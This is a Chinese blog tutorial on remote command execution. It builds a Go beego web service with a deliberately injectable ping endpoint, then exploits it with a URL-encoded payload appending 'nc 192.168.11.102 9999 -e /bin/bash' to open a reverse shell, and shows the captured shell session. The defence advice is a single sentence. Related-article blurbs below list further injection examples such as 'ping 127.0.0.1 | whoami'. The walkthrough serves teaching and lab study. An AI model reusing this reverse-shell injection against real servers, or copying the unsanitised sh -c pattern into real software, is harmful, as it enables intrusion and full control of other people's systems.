RCE利用和防护

最新推荐文章于 2024-04-30 09:56:59 发布
最新推荐文章于 2024-04-30 09:56:59 发布
阅读量883 收藏
点赞数
分类专栏: linux应用 文章标签: rce go beego nc http
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/javaxflinux/article/details/115294269
版权

RCE漏洞 远程代码执行 Web后端 命令注入 安全防御
关键词由CSDN通过智能技术生成

rce简介

远程命令执行 英文名称:RCE (remote code execution) ,简称RCE漏洞,是指用户通过浏览器提交执行命令。
原因:由于服务器端没有针对执行函数做过滤而执行一个恶意构造的代码或者程序。

RCE利用

编写web后端服务

$ go get -u github.com/beego/beego/v2
$ go get -u github.com/beego/bee/v2

$ cd $GOPATH/src
$ bee api hello
$ cd hello
$ touch controllers/ping.go

package controllers

import (
	"bufio"
	"bytes"
	"fmt"
	"io"
	"os/exec"

	beego "github.com/beego/beego/v2/server/web"
)

// Operations about Ping
type PingController struct {
	beego.Controller
}

const SHELL_CMD_EXEC_FAILED = "shell cmd exec failed"

// ShellCmdExec exec shell command
func ShellCmdExec(commandName string, params []string) (string, bool) {
	var ret_str string
	cmd := exec.Command(commandName, params...)
	fmt.Println("cmd:", cmd.Args)
	stdout, err := cmd.StdoutPipe()
	if err != nil {
		fmt.Println("cmd stdoutpipe err:", err)
		return SHELL_CMD_EXEC_FAILED, false
	}
	if err := cmd.Start(); err != nil {
		fmt.Println("cmd start err:", err)
		return SHELL_CMD_EXEC_FAILED, false
	}
	var stderr bytes.Buffer
	cmd.Stdout = &stderr
	cmd.Stderr = &stderr
	reader := bufio.NewReader(stdout)
	for {
		ret, err := reader.ReadString('\n')
		ret_str += ret
		if err != nil && io.EOF != err {
			fmt.Println("cmd read string err:", err)
			return SHELL_CMD_EXEC_FAILED, false
		}
		if io.EOF == err {
			break
		}
	}
	if err := cmd.Wait(); err != nil {
		fmt.Println("cmd wait err:", err, stderr.String())
		return ret_str, false
	}
	return ret_str, true
}

// @Title Ping
// @Description Ping
// @Param	ip		query 	string	true		"The ip for ping"
// @Success 200 {string} ping success
// @router /ping [get]
func (u *PingController) Ping() {
	ip := u.GetString("ip")
	cmd := fmt.Sprintf("ping -c 3 %s", ip)
	var param = []string{"-c", cmd}
	ret, _ := ShellCmdExec("sh", param)
	u.Data["json"] = map[string]string{"Result": ret}
	u.ServeJSON()
}

$vi routers/router.go
添加如下路由

beego.NSNamespace("/nettools",
			beego.NSInclude(
				&controllers.PingController{},
			),
		),

$ go mod tidy
$ bee run -gendoc=true -downdoc=true
$ curl -X GET “http://192.168.11.112:8888/v1/nettools/ping?ip=192.168.11.1” -H “accept: application/json”

nc反弹

$ nc -l -v -p 9999
$ curl -X GET “http://192.168.11.112:8888/v1/nettools/ping?ip=192.168.11.1%3Bnc%20192.168.11.102%209999%20-e%20%2Fbin%2Fbash” -H “accept: application/json”
//实际运行命令为ping -c 3 192.168.11.1;nc 192.168.11.102 9999 -e /bin/bash,在nc服务端即可输入pwd等系统命令,控制web所在的linux服务器
[xiaofeng@localhost ~]$ nc -l -v -p 9999
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::9999
Ncat: Listening on 0.0.0.0:9999
Ncat: Connection from 192.168.11.112.
Ncat: Connection from 192.168.11.112:60154.
pwd
/home/xiaofeng/src/hello

rce防御

对入参进行严格检查,防止命令注入

zerone改变世界
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
NGINX-RCE:nginx的rce漏洞利用
04-04
NGINX-RCE nginx的rce漏洞利用 怎么运行呢? 首先只需使用gcc gcc expl0itz.c -o expl0itz 然后chmod chmod +x expl0itz 像二进制文件一样运行之后! ./expl0itz
Spring framework deserialization RCE漏洞分析以及利用1
08-08
Spring框架的反序列化RCE漏洞分析与利用 在2021年初,Java反序列化漏洞引起广泛关注,研究人员不断探索其利用技巧。近期,安全研究员zerothoughts在Spring框架中发现了一个与Apache Commons Collection组件无关的...
RCE(远程代码执行漏洞)原理及漏洞利用
热门推荐
Ciyaso的博客
07-19 3万+
作用 RCE漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。 原理 一般出现这种漏洞,是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口。比如我们常见的路由器、防火墙、入侵检测等设备的web管理界面上。一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。 如果,设计者在完成该功能时,没有做严格的安全控制,则可能会导致攻击者通过该接口提交“意想不到”的命令,从而让后台进行执行,从
RCE漏洞总结及绕过---系统命令执行篇
qq_46603839的博客
04-23 1535
对于取反绕过~ 、参数逃逸等绕过方法放在了 代码执行漏洞篇中RCE漏洞防护1.对用户的输入作严格的过滤,建议使用白名单策略;2.尽量不使用容易产生漏洞的危险函数;
RCE函数利用
Ciyaso的博客
07-22 1113
1.代码注入 ①eval() eval ( string $code ) : mixed 说明:eval()把字符串code 作为PHP代码执行。 Caution函数eval()语言结构是非常危险的,因为它允许执行任意PHP代码。它这样用是很危险的。如果您仔细的确认过,除了使用此结构以外别无方法,请多加注意,不要允许传入任何由用户提供的、未经完整验证过的数据。 PS:传入的必须是有效的 PHP 代码。所有的语句必须以分号结尾。 return 语句会立即中止当前字符串的执行。 代码执行的作用域是调用 eva
webmin RCE漏洞利用及分析
weixin_30564901的博客
08-23 384
  Webmin是目前功能最强大的基于Web的Unix系统管理工具。管理员通过浏览器访问Webmin的各种管理功能并完成相应的管理动作。 利用条件:webmin <=1.910 原因:官网 SourceForge代码中存在漏洞,github代码中无漏洞,为后门植入,不得不佩服这些老外真会玩,看了一堆大神分析,自己简单记录下。 前面参数传递暂时不提,看下面这段代码,在perl...
(30)【RCE集合】RCE漏洞的原理、出现地方、相关命令、函数解析、利用详细的过程
04-09 2603
详细理解RCE漏洞
CVE-2020-15148 Yii框架反序列化RCE利用链 exp1
08-03
`BatchQueryResult`通常用于处理数据库查询的批量结果,但攻击者可以通过构造恶意序列化的对象来绕过框架的安全防护,导致任意代码执行。 具体来说,攻击者可以通过以下步骤利用漏洞: 1. 创建一个`yii\db\...
溯源系列:溯源(八)之利用goby RCE 进行反制黑客
01-06
在网络安全领域,"溯源"是指追踪并确定网络攻击的源头,以便进行有效的防御和反击。在"溯源系列:溯源(八)之利用...通过理解goby的RCE机制和跨平台支持,我们可以构建更强大的安全防护体系,对抗日益复杂的网络威胁。
如何利用三个漏洞组合达成Discord RCE漏洞 .pdf
09-05
3. **功能禁用限制的绕过 (CVE-2020-15174)**:这是一个特定的安全限制绕过漏洞,攻击者能够利用此漏洞绕过Discord应用内部的安全防护,进一步增强其XSS攻击的能力,从而将单一的XSS漏洞升级为更严重的威胁。...
struts利用工具1.2
01-22
3. **防护措施**:及时更新Struts2到最新版本,安装相关的安全补丁;配置Web应用防火墙以过滤异常的OGNL表达式;使用严格的Content-Type验证策略;限制不必要的动态方法调用。 4. **漏洞检测**:使用像"struts利用...
这居然是一个RCE漏洞
无心的博客
10-22 2534
在十八号的时候,FreeBuf发了一篇国外的挖洞经验《利用文件上传功能构造实现针对后端验证机制的RCE漏洞》,有兴趣的可以先去看一下原文。 目录 0x01 吐槽 0x02 漏洞分享 0x01 吐槽 严格来说,这个并不是一个RCE漏洞,它就是一个正常的文件上传,没有对文件做任何的过滤而造成的,但它最后的描述是这样的 然后获得的奖励是这样的 一个靠语言描述而成的漏洞利用,最终的奖金为3000美...
Window和Linux常用的管道符
weixin_43460822的博客
09-28 2117
Window系列支持的管道符如下所示。 " | ":直接执行后面的语句。例如:ping 127.0.0.1 | whoami。 “ || ”:如果前面执行的语句执行出错,则执行后面的语句,前面的语句只能为假。例如:ping 127.0.0.1 || whoami " & " :如果前面的语句为假则直接执行后面的语句,前面的语句可真可假。例如: ping 127.0.0.1 &wh...
RCE攻击知识点
na1519的博客
03-09 543
RCE定义:远程连接命令/代码执行漏洞,简称RCE漏洞,能够让攻击者直接向后台服务器远程写入服务器系统命令或者代码,从而控制后台系统。RCE分为远程连接命令执行ping和远程代码执行evel命令木马。 防御措施: 过滤特殊字符,说白了就是不相信用户的输入,全部转义,不符合规矩的全部处理掉~个人觉得最好的办法就是全部转成字符串 攻击过程 主动提交恶意数据到服务器,提交的代码能存储在数据库中。 比如用...
网络安全-渗透测试-RCE远程代码执行漏洞(1)-命令执行、代码执行
weixin_52796034的博客
10-26 2829
RCE(Remote Code Execution)远程代码执行漏洞(有时也叫命令执行漏洞)是一种安全漏洞,攻击者可以利用它来执行远程代码,从而控制受影响的系统。这种漏洞通常出现在应用程序或软件中,攻击者可以通过输入恶意构造的指令或数据,使得应用程序或软件在执行时执行攻击者指定的代码。RCE的范围比较广,只要渗透的最终结果可以实现执行命令或者代码都属于RCE,例如代码执行、文件包含、反序列化、命令执行,甚至是写文件Getshell都可以属于RCE,通常情况下RCE漏洞都可以归为高危漏洞!
远程命令/代码执行漏洞(RCE)总结
nigo134的博客
07-04 8388
PHP命令执行函数 1. system() : 原型:string system ( string $command [, int &$return_var ] ) 与passthru的基本相同,但是system返回结果并且输出。(查看system和pssthru的返回值可以看出) 2. shell_exec(): shell_exec — 通过 shell 环境执行命令 ( 这就意味着这个方法只能在 linux 或 mac os的shell环境中运行 ),并且将完整的输出以字符串的方式返
RCE漏洞原理与常见场景
Kali与编程
04-10 799
这意味着攻击者可以越过应用程序的正常边界,直接操控目标服务器或设备的核心功能,可能导致数据泄露、系统破坏、安装恶意软件,甚至完全控制目标系统。总之,RCE漏洞是对系统安全性构成严重威胁的一种漏洞类型,预防和解决此类漏洞需要从设计、编码、测试、运维等多个层面进行全方位的安全管控。RCE漏洞的根本原因在于应用程序未能正确验证用户输入,或者在处理敏感操作时未能进行严格的权限控制。的命令,系统将会先执行正常的ping命令,随后删除所有文件,这就是典型的命令注入导致的RCE。四、RCE漏洞的防范与缓解。
RCE漏洞总结及绕过---代码执行篇
最新发布
qq_46603839的博客
04-30 898
eval():该函数把字符串当做php代码来计算,并且字符串必须是合法的php代码,要以分号结尾;assert():该函数会检查一个指定断言。断言是一个逻辑学词汇,主要用于程序员来进行假设判断。断言只有两种类型,字符串型或者布尔型,当断言为flse时返回字符串表达式。如果断言是字符串那么会当做php代码执行;preg_replace():/e模式 正则匹配替换字符串,7.0版本后/e已经移除了;
向日葵RCE后续利用之本地提权
weixin_45794666的博客
02-27 1200
根据玄武实验室的文章 https://github.com/Ryze-T/CNVD-2022-10270-LPE 找到目标日志文件 cd /d c:/ dir /S sunlogin_service* 向日葵日志文件 sunlogin_service.20220226-171345.log 复现 安装.NET 4 https://www.microsoft.com/zh-cn/download/details.aspx?id=17718 在运行,发现需要指定路径路径,而我在win7下目录为 C:
GKCTF2021-官方WriteUp.pdf
07-06
这两个挑战展示了Web安全领域中常见的攻击技术,包括弱口令、模板注入、目录穿越、WAF绕过以及原型链污染和RCE,这些都是网络安全防护中需要重点考虑的问题。同时,这也提醒开发者在编写代码时要加强安全性,对输入...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值